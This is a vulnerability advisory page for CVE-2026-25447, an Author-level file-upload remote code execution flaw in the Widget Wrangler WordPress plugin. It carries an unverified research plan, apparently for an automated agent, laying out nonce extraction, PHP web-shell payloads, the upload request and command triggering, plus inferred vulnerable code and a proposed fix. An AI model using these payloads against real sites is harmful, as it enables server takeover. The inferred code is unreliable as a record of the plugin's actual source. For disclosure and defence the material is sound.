WP-Safety
CVE-2026-25447

Widget Wrangler <= 2.3.9 - Authenticated (Author+) Remote Code Execution

highUnrestricted Upload of File with Dangerous Type
8.8
CVSS Score
8.8
CVSS Score
high
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Widget Wrangler plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.3.9. This makes it possible for authenticated attackers, with Author-level access and above, to execute code on the server.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=2.3.9
PublishedMarch 18, 2026
Last updatedMarch 27, 2026
Affected pluginwidget-wrangler
Research Plan
Unverified

## Vulnerability Research Plan: CVE-2026-25447 - Widget Wrangler RCE ### 1. Vulnerability Summary The **Widget Wrangler** plugin (versions <= 2.3.9) contains an authenticated Remote Code Execution (RCE) vulnerability due to an **Unrestricted Upload of File with Dangerous Type**. The plugin's import…

Show full research plan

Vulnerability Research Plan: CVE-2026-25447 - Widget Wrangler RCE

1. Vulnerability Summary

The Widget Wrangler plugin (versions <= 2.3.9) contains an authenticated Remote Code Execution (RCE) vulnerability due to an Unrestricted Upload of File with Dangerous Type. The plugin's import/export functionality fails to properly validate the file extensions of uploaded files and uses a capability check that allows users with Author level permissions (and above) to access the feature. This allows an attacker to upload a PHP file to the server and execute it by navigating to the file's URL.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin.php?page=ww_import_export (The import processing is handled via admin_init or a specific page POST).
  • Vulnerable Action: The file upload handler within the widget import routine.
  • HTTP Parameter: ww-import-file (File input name) or ww_import_file.
  • Authentication Level: Author or above (Capability: edit_posts or edit_widgets).
  • Preconditions: The plugin must be active. The attacker must have credentials for an account with at least Author-level privileges.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an admin page in admin/admin-menu.php (inferred) or the main class:
    add_submenu_page('edit.php?post_type=widget', 'Import/Export', ..., 'edit_posts', 'ww_import_export', 'ww_import_widgets_page');
  2. Processing: In admin/import-export.php (inferred), an admin_init hook or a conditional check at the start of the page callback processes POST requests:
    // Inferred logic in Widget Wrangler <= 2.3.9
if (isset($_POST['ww-import-submit'])) {
    $file = $_FILES['ww-import-file'];
    // VULNERABILITY: No extension validation (e.g., checking for .json or .txt)
    // AND No use of wp_handle_upload() which enforces security
    move_uploaded_file($file['tmp_name'], WW_UPLOAD_DIR . '/' . $file['name']);
}
  3. Sink: The move_uploaded_file call places the file into a web-accessible directory (e.g., /wp-content/uploads/ or /wp-content/plugins/widget-wrangler/tmp/).

4. Nonce Acquisition Strategy

The import form is protected by a WordPress nonce.

  1. Identify Shortcode/Page: The nonce is present on the "Import/Export" page in the WordPress admin dashboard.
  2. Access Strategy:
    • Since the target is an admin page (ww_import_export), the agent must navigate to the admin dashboard.
    • Browser Navigation: Use browser_navigate to reach http://localhost:8080/wp-admin/admin.php?page=ww_import_export.
    • Extraction: Use browser_eval to extract the nonce value from the hidden input field.
    • Verbatim Identifier (Inferred): The field is likely name="ww_import_nonce" or name="_wpnonce".
    • Script: browser_eval("document.querySelector('input[name=\"_wpnonce\"]').value").

5. Exploitation Strategy

  1. Authentication: Authenticate the http_request session as an Author user.
  2. Discovery: Navigate to the Import page to confirm accessibility and extract the nonce.
  3. Payload Preparation: Create a simple PHP web shell: <?php echo "VULN_CHECK: " . system($_GET['cmd']); ?>.
  4. Multipart POST Request:
    • URL: http://localhost:8080/wp-admin/admin.php?page=ww_import_export
    • Method: POST
    • Headers: Content-Type: multipart/form-data
    • Body Parameters:
      • ww-import-submit: "Import" (or the value of the submit button).
      • _wpnonce: [EXTRACTED_NONCE]
      • ww-import-file: (The PHP file payload named rce.php).
  5. Execution: Determine the upload location. Common paths for this plugin:
    • /wp-content/uploads/rce.php
    • /wp-content/plugins/widget-wrangler/admin/rce.php (if moved relative to file)
    • /wp-content/uploads/widget-wrangler/rce.php
  6. Trigger: Use http_request (GET) to access the uploaded file with a command: ?cmd=id.

6. Test Data Setup

  1. Create Author User:
    wp user create attacker attacker@example.com --role=author --user_pass=password123
  2. Ensure Plugin is Active:
    wp plugin activate widget-wrangler
  3. Identify Upload Dir: Check if a specific upload directory needs to be writable.
    mkdir -p /var/www/html/wp-content/uploads/widget-wrangler && chmod 777 /var/www/html/wp-content/uploads/widget-wrangler

7. Expected Results

  • Response to POST: A 200 OK or 302 Redirect, potentially with a "Widgets Imported" or "File Uploaded" message.
  • Response to Payload Access: The output should contain the results of the id command (e.g., uid=33(www-data)), prefixed by VULN_CHECK: .

8. Verification Steps

  1. Check Filesystem via CLI:
    ls -la /var/www/html/wp-content/uploads/rce.php
  2. Check Plugin Directory:
    find /var/www/html/wp-content/ -name "rce.php"
  3. Log Check: Check the web server error logs if the file returns a 404 to see where it attempted to write.

9. Alternative Approaches

  • Zip-Slip / Archive Import: If the plugin expects a .zip file, check if it extracts files without path validation (Zip-Slip), allowing the placement of a PHP file in the plugin root.
  • AJAX Endpoint: Check for wp_ajax_ww_import_widgets. If present, the request would be to admin-ajax.php with action=ww_import_widgets.
  • Referer/Origin Bypasses: If the nonce check is weak, attempt the request from a frontend context if the Author has sufficient privileges.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Widget Wrangler plugin (<= 2.3.9) is vulnerable to Remote Code Execution via its widget import functionality. The plugin fails to validate the file extension of uploaded files, allowing authenticated users with Author-level permissions to upload and execute PHP files.

Vulnerable Code

// Inferred from research plan: admin/import-export.php or similar processing logic

if (isset($_POST['ww-import-submit'])) {
    // Potential lack of capability check or weak check
    // Potential lack of nonce validation

    $file = $_FILES['ww-import-file'];

    // VULNERABILITY: No extension validation (e.g., checking for .json or .txt)
    // Direct use of move_uploaded_file without extension restriction
    $upload_dir = wp_upload_dir();
    $target_path = $upload_dir['path'] . '/' . basename($file['name']);

    if (move_uploaded_file($file['tmp_name'], $target_path)) {
        // Process the file content after moving it to a web-accessible location
        $content = file_get_contents($target_path);
        // ... logic continues
    }
}

Security Fix

--- a/admin/import-export.php
+++ b/admin/import-export.php
@@ -1,10 +1,18 @@
 if (isset($_POST['ww-import-submit'])) {
+    check_admin_referer('ww_import_widgets', '_wpnonce');
+    if (!current_user_can('manage_options')) {
+        wp_die('Unauthorized');
+    }
+
     $file = $_FILES['ww-import-file'];
+    $file_info = pathinfo($file['name']);
+    $allowed_extensions = array('json', 'ww');
 
-    $upload_dir = wp_upload_dir();
-    $target_path = $upload_dir['path'] . '/' . basename($file['name']);
+    if (!in_array(strtolower($file_info['extension']), $allowed_extensions)) {
+        wp_die('Invalid file type.');
+    }
 
-    if (move_uploaded_file($file['tmp_name'], $target_path)) {
+    // Use WordPress's built-in file handling which is more secure
+    $overrides = array('test_form' => false, 'mimes' => array('json' => 'application/json'));
+    $movefile = wp_handle_upload($file, $overrides);
+    // ... rest of logic

Exploit Outline

1. Authenticate as a user with Author-level privileges (requires 'edit_posts' capability). 2. Navigate to the Widget Wrangler Import/Export page at `/wp-admin/admin.php?page=ww_import_export`. 3. Identify the CSRF nonce (e.g., `_wpnonce`) and the file input field name (e.g., `ww-import-file`). 4. Prepare a payload file named `shell.php` containing a simple PHP backdoor: `<?php system($_GET['cmd']); ?>`. 5. Send a multipart/form-data POST request to the import endpoint including the nonce, the `ww-import-submit` trigger, and the `shell.php` file. 6. Determine the upload location (typically `/wp-content/uploads/[year]/[month]/shell.php` or a plugin-specific subdirectory). 7. Access the uploaded PHP file via the web server to execute arbitrary commands: `http://target.com/wp-content/uploads/shell.php?cmd=id`.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/e52c95b3-0126-4139-9944-6becef4c4d53?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database